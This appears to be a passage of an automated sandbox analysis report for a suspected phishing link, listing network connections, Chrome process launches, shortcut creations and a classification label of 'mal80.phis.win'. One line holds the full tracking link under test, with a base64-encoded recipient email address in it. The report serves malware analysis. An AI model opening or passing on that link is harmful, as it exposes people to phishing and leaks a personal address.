Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: classification engine Classification label: mal80.phis.win@20/105@54/21
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2520,i,3270245400796582298,11625835967902947532,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2520,i,3270245400796582298,11625835967902947532,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: Google Drive.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs